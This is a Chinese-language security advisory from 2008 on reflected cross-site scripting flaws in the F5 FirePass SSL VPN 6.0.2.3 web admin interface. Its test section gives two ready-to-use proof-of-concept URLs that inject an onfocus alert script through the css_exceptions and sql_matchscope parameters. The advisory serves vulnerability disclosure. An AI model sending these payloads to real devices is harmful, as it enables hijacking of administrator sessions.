发布日期：2008-06-05
更新日期：2008-06-06

受影响系统：

F5 FirePass 6.0.2.3

描述：

---

BUGTRAQ  ID: 29574

F5 FirePass SSL VPN设备允许用户安全的连接到关键业务应用设备上。

F5 FirePass SSL VPN设备对通过Portal Access所提交的Web请求执行基本的过滤，Content Inspection功能是通过Web管理接口配置和自定义的，而这个Web管理界面的/vdesk/admincon/webyfiers.php文件没有正确地验证css_exceptions参数输入，/vdesk/admincon/index.php文件没有正确地验证sql_matchscope参数输入。如果远程攻击者向上述页面提交了恶意HTTP请求的话，就可以执行跨站脚本攻击，导致执行任意指令。

<*来源：nnposter （nnposter@disclosed.not）
  
  链接：http://marc.info/?l=bugtraq&m=121269978700979&w=2
        http://secunia.com/advisories/30550/
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

https://(target)/vdesk/admincon/webyfiers.php?a=css&click=1&css_exceptions=%22+onfocus%3Dalert%28%26quot%3BXSS1%26quot%3B%29+foo%3D%22&save_css_exceptions=Update
https://(target)/vdesk/admincon/index.php?a=css&sub=sql&sql_matchscope=%22+onfocus%3Dalert%28%26quot%3BXSS2%26quot%3B%29+foo%3D%22&save_sql_matchscope=Update

建议：

---

厂商补丁：

F5
--
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.f5.com/

浏览次数：2580
严重程度：0（网友投票）